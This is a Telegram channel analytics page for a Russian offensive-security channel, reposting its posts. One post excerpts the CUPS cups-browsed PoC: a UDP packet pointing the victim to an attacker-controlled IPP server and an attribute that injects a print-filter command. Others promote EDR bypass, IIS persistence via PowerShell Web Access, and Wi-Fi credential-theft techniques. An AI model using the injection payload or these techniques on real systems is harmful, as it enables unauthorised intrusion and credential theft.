en
Feedback
AD_POHEQUE

AD_POHEQUE

Open in Telegram

Будь тем, чем другие не были.

Show more
1 064
Subscribers
No data24 hours
+47 days
+430 days

Data loading in progress...

Tags Cloud
No data
Any problems? Please refresh the page or contact our support manager.
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
March '25
March '25
+23
in 0 channels
February '25
+42
in 0 channels
Get PRO
January '25
+17
in 1 channels
Get PRO
December '24
+37
in 4 channels
Get PRO
November '24
+43
in 1 channels
Get PRO
October '24
+129
in 6 channels
Get PRO
September '240
in 1 channels
Get PRO
August '240
in 0 channels
Get PRO
July '240
in 0 channels
Get PRO
June '240
in 0 channels
Get PRO
May '240
in 0 channels
Get PRO
April '240
in 0 channels
Get PRO
March '240
in 0 channels
Get PRO
February '24
+4
in 0 channels
Get PRO
January '24
+9
in 0 channels
Get PRO
December '230
in 0 channels
Get PRO
November '230
in 4 channels
Get PRO
October '230
in 0 channels
Get PRO
September '23
+14
in 0 channels
Get PRO
August '23
+57
in 0 channels
Get PRO
July '23
+835
in 0 channels
Date
Subscriber Growth
Mentions
Channels
31 March+3
30 March0
29 March+2
28 March0
27 March0
26 March+2
25 March+1
24 March0
23 March0
22 March0
21 March+1
20 March+1
19 March+1
18 March+1
17 March0
16 March0
15 March0
14 March+1
13 March+1
12 March+1
11 March+1
10 March0
09 March0
08 March+2
07 March+1
06 March0
05 March+2
04 March+1
03 March0
02 March0
01 March+1
Channel Posts
Этот год был непростым для многих из нас. Для кого-то он стал временем серьёзных испытаний, а для кого-то даже потрясений. Я знаю это по собственному опыту. Но если мы смогли пройти через это, значит, мы справились. Мы выдержали. А это уже немало. Теперь мы знаем, что способны на большее. Пусть Господь и дальше будет на нашей стороне в новом году. И давайте двигаться вперёд — без иллюзий, с ясным пониманием ситуации и готовностью брать своё. Стремитесь к свету, оставайтесь на стороне справедливости и помните: сила в правде. Берегите себя и своих близких. С Новым годом! 👾

2
За этот год я насмотрелся на настоящий цирк в ИБ. Специалисты клепают отчёты ради kpi, пока их инфраструктура гниёт, бюджеты летят на «сертифицированные» СЗИ, которые защищают разве что от здравого смысла. Найм в IT превратился в анекдот: берут кого попало, главное — чтобы покладистый. И девиз у них подходящий: «Коллеги, у нас много работы, думать некогда — надо работать!». Как писал Фейербах: «Высшая степень иллюзорности представляет для них высшую степень святости». После эфира со Skillbox я написал статью, где разложили всё по фактам. Без прикрас, маркетингового мусора и сказок про волшебные таблетки. Это про то, как построить минимальную, но работающую защиту, а не раздувать бюджеты ради видимости. Что в статье:  - Как не закопать деньги в бесполезные подписки.  - Как собрать инфраструктуру, которая держит удар.  - Как настроить процессы, которые не развалятся при первом запуске Nmap.  Если вы хотите разобраться, как на практике выстроить процессы ИБ, при этом не попасть в клуб papersec'ов и прочих "воинов бумажных", — эта статья для вас. 👾 https://skillbox.ru/media/code/kak-postroit-bezopasnuyu-sistemu-dlya-it-proekta-layfhaki-ot-belogo-hakera/
841
3
👾Подпишись👾
874
4
Презентация с которой я выступал на митапе 25.10.25 в Bi.Zone. Разобрал два эффективных подхода для исполнения кода в обход E
Презентация с которой я выступал на митапе 25.10.25 в Bi.Zone. Разобрал два эффективных подхода для исполнения кода в обход EDR предложенные Фабианом Мошем и Маркусом Хатчинзом. Эти парни и их исследования часто выручали меня на реальных проектах, считаю их спонсорами моих компетенций. Актуальности они не потеряли, пользуйтесь. 👾Подпишись👾
822
5
Есть такая конторка под названием Vulnerability Information and Coordination Environment, или просто VINCE. Работают под патр
Есть такая конторка под названием Vulnerability Information and Coordination Environment, или просто VINCE. Работают под патронажем американской Cybersecurity & Infrastructure Security Agency, сокращённо киса CISA. Всё серьёзно: кибербезопасность от самых "безопасных" безопасников. Инфосеки лютые. Но самое интересное: им можно сдавать баги. А потом удобно усесться, с чашечкой чая, и наблюдать, как нераскрытые отчеты по уязвимостям внезапно оказываются на breachforums. Вот такой вот "координационный" подход. 😂 А теперь про саму уязвимость. Если вкратце, исследователь обнаружил что у него по 0.0.0.0 вещает UDP порт 631, после того как поставил Ubuntu на свой компьютер. Немного погулив, он выяснил, что это сервис cups-browsed, который является частью системы CUPS, и он отвечает за обнаружение новых принтеров и их автоматическое добавление в систему. Linux просто добавляет все найденное в сети, прежде чем пользователь сможет это подтвердить или хотя бы получить уведомление. 😱 Выдержка из PoC. Шаг 1: Атакующий запускает вредоносный IPP-сервер, а затем отправляет первый UDP-пакет на целевую машину по порту 631: 0 3 http://<IP-АТАКУЮЩЕГО>:<ПОРТ>/printers/whatever Это заставит целевую машину подключиться обратно к серверу IPP, находящемуся под контролем атакующего, и раскрыть версию ядра и CUPS в заголовке User-Agent. Шаг 2: Это заставляет жертву подключиться к IPP-серверу атакующего и запросить его атрибуты. Сервер отвечает списком допустимых атрибутов, включая последний атрибут, используемый для инъекции команд в ОС: # ... другие допустимые атрибуты ... (     SectionEnum.printer,     b'printer-privacy-policy-uri',     TagEnum.uri ): [b'https://www.google.com/"\n*FoomaticRIPCommandLine: "' +     self.command.encode() +     b'"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'], Это приведет к: - Инъекции пользовательских PPD-директив (с двойной кавычкой и новой строкой) в временный PPD-файл. (Баг: строки из атрибутов должны экранироваться) - Обходу этих проверок. (Баг: пробел, добавленный перед двоеточием, позволяет обойти проверки на основе strncmp) В результате получим следующий PPD: ... *cupsSNMPSupplies: False *cupsLanguages: "en" *cupsPrivacyURI: "https://www.google.com/" *FoomaticRIPCommandLine: "echo 1 > /tmp/I_AM_VULNERABLE" *cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip" *cupsSingleFile: True *cupsFilter2: "application/vnd.cups-pdf application/pdf 0 -" ... Этот PPD приведет к выполнению команды echo 1 > /tmp/I_AM_VULNERABLE на целевой машине при отправке задания на печать на поддельный принтер. 🫡 👾Подпишись👾
820
6
😃 Звучит как новый вызов.
😃 Звучит как новый вызов.
691
7
Стоит расширять свои компетенции, хоть я и с большой любовь отношусь к продуктам от Windows и их подходу к безопасной разработке 😄 Не так давно читал на хабре статью о безопасности FreeIPA от Всеволода Саломадина из R-Vision. https://habr.com/ru/companies/rvision/articles/825086/ Пару часов назад на ютубе опубликовали доклад на эту тему от автора статьи. https://youtu.be/oLGcuta4R-8 Всем приятного просмотра 🍿 PS: Базовые концепции также описаны в статье на хактриксе, плюс внизу ссылки на цикл статей от SpecterOps, которые определенно будут интересны специалистам по наступательной безопасности. https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting 👾ЖМИ СПЕЙСИНВЕЙДЕРА👾
837
8
😄Ловите новый гайд по закреплению на IIS-серверах через PSWA (PowerShell Web Access). Как злоупотребить легитимным функционалом и превратить его в свою точку опоры. Примеры команд, коротко и по делу. Подписывайся на @ad_poheque, чтобы быть в курсе актуальных методов взлома! 👾 👾 ЖМИ СПЕЙСИНВЕЙДЕРА 👾
2 853
9
🚀 Прикури от root'а: как взломать Linux с помощью зажигалки Бомбовый материал от David'а Buchanan'а — атака с использованием
🚀 Прикури от root'а: как взломать Linux с помощью зажигалки Бомбовый материал от David'а Buchanan'а — атака с использованием обычной зажигалки для bit-flip'а в памяти! 📲🔥 Исследователь показал, как с помощью электромагнитных импульсов, создаваемых пьезоэлектрическим воспламенителем зажигали, можно вызвать аппаратные сбои в памяти, получить произвольный доступ к данным и поднять привилегии до root на Linux. Суть эксплойта: - Припаиваем антенну к шине DDR3 💻 - Щелкаем зажигалкой 🔥 - Ловим переворот бита 🎯 - Эксплуатируем CPython, создавая примитив для чтения/записи в памяти 📜 - Загружаем shell-код и получаем root 🏴‍☠️ 💥 Эта статья замечательная демонстрация того, как изящно можно использовать физические уязвимости для реальных атак. Полный разбор + код здесь: [PoC] [Оригинальная статья] Берите на вооружение ;) Спейсинвейдера жми 👾
11 363
10
+1
wireless_ad_poheque.md
1 630
11
Ломаем Wi-Fi с клиентами и без, грабим клиентов WPA*-Enterprise на доменные пароли в открытом виде. Шпаргалка представляет собой чёткую инструкцию по атакам на сети Wi-Fi. Описаны ключевые команды для мониторинга, перехвата рукопожатий, взлома сетей WPA2-Personal и атак на клиентов WPA2-Enterprise. Для тех, кто хочет освоить базовые навыки пентестера и ломать корпоративные сети покуривая сигаретки около офиса Заказчика или попивать чай в кафе где обычно обедает его персонал. Предложены методы для атак на клиентов через захват PMKID и рукопожатий, а также более сложные сценарии атак типа Evil Twin и MANA. Это руководство поможет раздобыть учетные записи, хэши и иногда пароли в открытом виде без привлечения внимания клиентов и получить серьезные аргументы для дальнейших атак на целевые корпоративные сети. Особое внимание уделено использованию eaphammer для эффективного выполнения атак на WPA2-Enterprise и проведения атак методом социальной инженерии через captive portal. Да, она старая, но актуальности не потеряла. Часто выручала на проектах. Спейс инведера жми. 👾
1 413
12
можно еще и на книжках сэкономить 500 рублей.
можно еще и на книжках сэкономить 500 рублей.
1 040
13
это напоминание для себя многое пройдено, большее ещё предстоит впереди может и тебе пригодится 👾
это напоминание для себя многое пройдено, большее ещё предстоит впереди может и тебе пригодится 👾
1 067
14
Пашка, держись!
967
15
🤡
1 538
16
No text...
1 755
17
Happy Supply Chain Attack Friday! tldr if you updated Kali Linux recently you're pwned with malware https://twitter.com/kalilinux/status/1773786266074513523
2 167
18
https://youtu.be/P47V4SASwGc?si=hh7A_8V7gjaNZ3Qo
2 214
19
Нет повести печальнее на свете, чем на бича зарегистрированный киви-кошелек. 👾
2 215
20
Давно сюда ничего не постил, но тут наткнулся на интересный килчейн построенный на тривиальных техниках. Посты будут. Позже.
Давно сюда ничего не постил, но тут наткнулся на интересный килчейн построенный на тривиальных техниках. Посты будут. Позже. Работы валом и вам того желаю. Спейс инвейдера жмём. 👾
2 160